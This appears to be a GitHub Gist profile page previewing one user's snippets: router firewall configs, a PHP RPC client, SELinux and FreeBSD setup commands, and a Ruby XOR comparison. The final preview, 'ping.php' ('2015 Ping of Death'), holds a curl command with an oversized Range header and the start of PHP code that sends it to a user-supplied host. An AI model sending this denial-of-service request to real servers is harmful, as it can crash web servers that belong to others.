Skip to content

Instantly share code, notes, and snippets.

Avatar
🦆
Meow.

Tom Hetmer TomHetmer

🦆
Meow.
View GitHub Profile
@TomHetmer
TomHetmer / erx-2.0.conf
Last active Sep 21, 2019
master blaster router
View erx-2.0.conf
firewall {
all-ping enable
broadcast-ping disable
ipv6-name WANv6_IN {
default-action drop
description "WAN inbound traffic forwarded to LAN"
enable-default-log
rule 10 {
action accept
description "Allow established/related sessions"
@TomHetmer
TomHetmer / erx.conf
Created Mar 14, 2018
new cpe config
View erx.conf
firewall {
all-ping enable
broadcast-ping disable
ipv6-name allow-all-6 {
default-action accept
}
ipv6-name allow-est-drop-inv-6 {
default-action drop
enable-default-log
rule 1 {
@TomHetmer
TomHetmer / gist:4430857313539b2585a5175ca3c1ed81
Last active Aug 8, 2017
final php socket client for golang json rpc server
View gist:4430857313539b2585a5175ca3c1ed81
<?php
$timeout = 1;
$chunkSize = 4;
function callRPC($host, $targets, $timeout, $chunkSize) {
$sockets = [];
$errno = 0;
$errstr = '';
// Send.
$s = stream_socket_client($host, $errno, $errstr, $timeout);
if (!$s) {
@TomHetmer
TomHetmer / ftplicity
Last active Aug 19, 2016
docker build -t "ftplicity" .
View ftplicity
FROM wernight/duplicity
USER root
RUN apk add --update lftp
USER duplicity
@TomHetmer
TomHetmer / caddy.sh
Last active Aug 1, 2018
caddy for SELinux
View caddy.sh
setcap cap_net_bind_service=+ep /usr/local/bin/caddy
nano /etc/systemd/system/caddy.service
semanage fcontext -a -t httpd_exec_t /usr/local/bin/caddy
restorecon /usr/local/bin/caddy
chown www-data:www-data /etc/ssl/caddy/
semanage fcontext -a -t httpd_sys_rw_content_t /etc/ssl/caddy
restorecon /etc/ssl/caddy
@TomHetmer
TomHetmer / setcap.sh
Created May 17, 2016
setcap 'cap_net_bind_service=+ep' for FreeBSD
View setcap.sh
# ref.
# https://www.freebsd.org/cgi/man.cgi?query=mac_portacl&sektion=4
# https://www.freebsd.org/doc/handbook/mac-policies.html
# load the kernel module
kldload mac_portacl
# set the new security rules
sysctl security.mac.portacl.rules=uid:80:tcp:80,uid:80:tcp:443
View dnx8.rb
pt = [87, 1, 186, 160, 224, 132, 237, 176, 234, 208, 194, 17, 239, 2, 74, 244, 61, 200, 116, 91, 32, 145, 28, 243, 216, 185, 188, 136, 250, 183, 125, 229, 179, 235, 20, 194, 10, 61, 15]
ct = [31, 64, 234, 240, 185, 164, 172, 224, 184, 153, 142, 49, 169, 77, 5, 184, 110, 232, 70, 107, 17, 167, 60, 181, 138, 246, 241, 168, 170, 229, 52, 188, 252, 166, 58, 141, 88, 122, 46]
count = pt.count
for i in 0..count-1 do
p = pt[i]
c = ct[i]
@TomHetmer
TomHetmer / restore.ps1
Last active Aug 29, 2015
reconstruct an incremental backup on windows
View restore.ps1
Get-ChildItem | Get-ChildItem | Copy-Item -Destination ../new -Recurse -Container -Force
@TomHetmer
TomHetmer / cpe.rsc
Last active Dec 8, 2020
Home RB2011. This ain't no shitty router config.
View cpe.rsc
# dec/11/2015 01:56:33 by RouterOS 6.33.3
# software id = 2XNH-LS38
#
/interface bridge
add name=LAN protocol-mode=none
add name=WAN protocol-mode=none
/interface ethernet
set [ find default-name=ether1 ] name=ether1-WAN
set [ find default-name=ether2 ] name=ether2-PC1
set [ find default-name=ether3 ] master-port=ether2-PC1 name=ether3-PC2
@TomHetmer
TomHetmer / ping.php
Created Apr 18, 2015
2015 Ping of Death
View ping.php
<?php
// curl -v [ipaddress]/static.png -H "Host: test" -H "Range: bytes=0-18446744073709551615"
if (isset($_GET["host"]) && isset($_GET["url"])) {
$h = htmlspecialchars($_GET["host"]);
$ip = gethostbyname($h);
$url = htmlspecialchars($_GET["url"]);
$opts = array('http' =>
array(